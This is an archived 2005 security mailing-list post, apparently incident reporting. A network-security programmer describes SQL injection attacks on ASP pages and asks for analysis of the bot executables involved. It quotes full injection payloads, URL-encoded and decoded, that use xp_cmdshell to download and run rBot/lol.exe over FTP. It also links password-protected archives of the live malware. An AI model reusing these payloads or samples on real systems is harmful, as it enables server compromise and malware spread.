[Full-Disclosure] Re: [Dshield] SQL injection worm ?

From: Maxime Ducharme (mducharme_at_cybergeneration.com)
Date: 01/19/05

  • Next message: John Costa: "[Full-Disclosure] BlackBerry PIN's are Not Confidential"
    To: <full-disclosure@lists.netsys.com>, "General DShield Discussion List" <list@lists.dshield.org>, <incidents@securityfocus.com>
    Date: Wed, 19 Jan 2005 14:12:39 -0500
    
    

    Hi to the List

    today we received the same SQL injection attack
    on the same URL :

    IP : 24.1.139.29
    (c-24-1-139-29.client.comcast.net)
    User Agent : none sent
    HTTP Verb : GET /theasppage.asp?anID=
    Attack :
    377';exec MASTER..xp_cmdshell 'mkdir %systemroot%\system32\Macromed\lolx\';
    exec MASTER..xp_cmdshell 'echo open z.z.z.z 21 >>
    %systemroot%\system32\Macromed\lolx\blah.jkd';
    exec MASTER..xp_cmdshell 'echo USER chadicka r0ckpaul >>
    %systemroot%\system32\macromed\lolx\blah.jkd';
    exec MASTER..xp_cmdshell 'echo binary >>
    %systemroot%\system32\macromed\lolx\blah.jkd';
    exec MASTER..xp_cmdshell 'echo get lol.exe
    %systemroot%\system32\Macromed\lolx\arcdlrde.exe >>
    %systemroot%\system32\Macromed\lolx\blah.jkd';
    exec MASTER..xp_cmdshell 'echo quit >>
    %systemroot%\system32\Macromed\lolx\blah.jkd';
    exec MASTER..xp_cmdshell
    'ftp.exe -i -n -v -s:%systemroot%\system32\Macromed\lolx\blah.jkd';
    exec MASTER..xp_cmdshell 'del %systemroot%\system32\Macromed\lolx\blah.jkd';
    exec MASTER..xp_cmdshell
    '%systemroot%\system32\Macromed\lolx\arcdlrde.exe'--

    The lol.exe file can be found in this archive for inspection :
    http://www.cybergeneration.com/security/2005.01.19/lol.zip
    zip pass is das978tewa234

    Norton with definitions of 12 jan. doesnt find anything
    suspicious.

    I'm interested if someone do an analysis on this file.

    Have a nice day

    Maxime Ducharme
    Programmeur / Spécialiste en sécurité réseau

    ----- Original Message -----
    From: "Maxime Ducharme" <mducharme@cybergeneration.com>
    To: <full-disclosure@lists.netsys.com>; "General DShield Discussion List"
    <list@lists.dshield.org>; <incidents@securityfocus.com>
    Sent: Wednesday, January 05, 2005 12:22 PM
    Subject: [Dshield] SQL injection worm ?

    >
    > Hi list,
    > we receveid a particular SQL injection attack
    > on one of our site.
    >
    > Attack looks like :
    > 2005-01-05 14:39:20 24.164.202.24 - W3SVCX SRVNAME x.x.x.x 80 GET
    > /Nouvelles.asp
    >
    id_nouvelle=377';%65%78%65%63%20%4D%41%53%54%45%52..%78%70%5F%63%6D%64%73%68
    >
    %65%6C%6C%20'mkdir%20%25systemroot%25%5Csystem32%5CMacromed%5Clolx%5C';%65%7
    >
    8%65%63%20%4D%41%53%54%45%52..%78%70%5F%63%6D%64%73%68%65%6C%6C%20'echo%20op
    > en%20y.y.y.y%2021%20%3E%3E%20%25systemroot%25%5Csystem32%5CMacromed%
    >
    5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45%52..%78%70%5F%63%6D%64%73%
    >
    68%65%6C%6C%20'echo%20USER%20hahajk%20hahaowned%20%3E%3E%20%25systemroot%25%
    >
    5Csystem32%5Cmacromed%5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45%52..
    >
    %78%70%5F%63%6D%64%73%68%65%6C%6C%20'echo%20get%20rBot.exe%20%25systemroot%2
    >
    5%5Csystem32%5CMacromed%5Clolx%5Carcdlrde.exe%20%3E%3E%20%25systemroot%25%5C
    >
    system32%5CMacromed%5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45%52..%7
    >
    8%70%5F%63%6D%64%73%68%65%6C%6C%20'echo%20quit%20%3E%3E%20%25systemroot%25%5
    >
    Csystem32%5CMacromed%5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45%52..%
    >
    78%70%5F%63%6D%64%73%68%65%6C%6C%20'ftp.exe%20-i%20-n%20-v%20-s:%25systemroo
    >
    t%25%5Csystem32%5CMacromed%5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45
    >
    %52..%78%70%5F%63%6D%64%73%68%65%6C%6C%20'del%20%25systemroot%25%5Csystem32%
    >
    5CMacromed%5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45%52..%78%70%5F%6
    >
    3%6D%64%73%68%65%6C%6C%20'%25systemroot%25%5Csystem32%5CMacromed%5Clolx%5Car
    >
    cdlrde.exe'--|17|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Lin
    > e_1:_Incorrect_syntax_near_''. 500 0 0 1395 570 HTTP/1.1
    > attacked.web.site.com - - -
    >
    > HTTP request contains only 2 fields (beside HTTP method) :
    > Connection: Keep-Alive
    > Host: attacked.web.site.com
    >
    > (I obviously replaced the name of the site).
    >
    > Decoded SQL injection looks like :
    > exec MASTER..xp_cmdshell 'mkdir %systemroot%\system32\Macromed\lolx\';
    > exec MASTER..xp_cmdshell 'echo open y.y.y.y 21 >>
    > %systemroot%\system32\Macromed\lolx\blah.jkd';
    > exec MASTER..xp_cmdshell 'echo USER hahajk hahaowned >>
    > %systemroot%\system32\macromed\lolx\blah.jkd';
    > exec MASTER..xp_cmdshell 'echo get rBot.exe
    > %systemroot%\system32\Macromed\lolx\arcdlrde.exe >>
    > %systemroot%\system32\Macromed\lolx\blah.jkd';
    > exec MASTER..xp_cmdshell 'echo quit >>
    > %systemroot%\system32\Macromed\lolx\blah.jkd';
    > exec MASTER..xp_cmdshell
    > 'ftp.exe -i -n -v -s:%systemroot%\system32\Macromed\lolx\blah.jkd';
    > exec MASTER..xp_cmdshell 'del
    %systemroot%\system32\Macromed\lolx\blah.jkd';
    > exec MASTER..xp_cmdshell '%systemroot%\system32\Macromed\lolx\arcdlrde.exe
    >
    > y.y.y.y is a foreign IP in Europe which host FTP an WWW server.
    > I sent a notice this this site sysadmin about the situation.
    >
    > I have been able to connect to this FTP with the account hahajk/hahaowned
    > (which do not seem legit to me ...) and download suspicious files.
    > I mirrored them here :
    > http://www.cybergeneration.com/security/2005.01.05/rbot.exe_ftp.zip
    > zip pass is 968goyw439807r3qw
    >
    > 24.164.202.24 is on rr.com networks, they have also been advised.
    >
    > I know rbot.exe is known to be Randex worm, but i'd like that have
    > some other results / analysis.
    >
    > I also found a "test.asp" file which contains the Spybot worm.
    >
    > Weird thing is, I searched for this hosts's activity on every server
    > and every firewall we run, and I only see 1 TCP connection which
    > is the prepared SQL injections attack, nothing else.
    >
    > Anybody see similar activity ?
    >
    > I'm asking since I want to know if we are targeted by someone of
    > by a worm like Santy of use search engines to find vulnerable
    > ASP scripts.
    >
    > Thanks in advance
    >
    > Happy new year to everyone !
    >
    > Maxime Ducharme
    > Programmeur / Spécialiste en sécurité réseau
    >
    >
    >
    > -------------- Sponsor Message ------------------------------------
    > SANS Intrusion Immersion Training: Orlando, FL, February 3-9th
    > http://www.sans.org/orlando05
    >
    > _______________________________________________
    > send all posts to list@lists.dshield.org
    > To change your subscription options (or unsubscribe), see:
    http://www.dshield.org/mailman/listinfo/list
    >

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html


  • Next message: John Costa: "[Full-Disclosure] BlackBerry PIN's are Not Confidential"

    Relevant Pages

    • FW: [Full-Disclosure] Re: [Dshield] SQL injection worm ?
      ... Subject: Re: SQL injection worm? ... exec MASTER..xp_cmdshell 'echo quit>> ... > we receveid a particular SQL injection attack on one of our site. ...
      (Full-Disclosure)
    • SQL injection ... another attack
      ... today we received the same SQL injection attack ... exec MASTER..xp_cmdshell 'echo get lol.exe ... Subject: SQL injection worm? ...
      (Incidents)
    • [Full-Disclosure] SQL injection worm ?
      ... we receveid a particular SQL injection attack ... Decoded SQL injection looks like: ... exec MASTER..xp_cmdshell 'echo USER hahajk hahaowned>> ... I also found a "test.asp" file which contains the Spybot worm. ...
      (Full-Disclosure)
    • [Full-Disclosure] SQL injection worm ?
      ... we receveid a particular SQL injection attack ... Decoded SQL injection looks like: ... exec MASTER..xp_cmdshell 'echo USER hahajk hahaowned>> ... I also found a "test.asp" file which contains the Spybot worm. ...
      (Full-Disclosure)
    • SQL injection worm ?
      ... we receveid a particular SQL injection attack ... Decoded SQL injection looks like: ... exec MASTER..xp_cmdshell 'echo USER hahajk hahaowned>> ... I also found a "test.asp" file which contains the Spybot worm. ...
      (Incidents)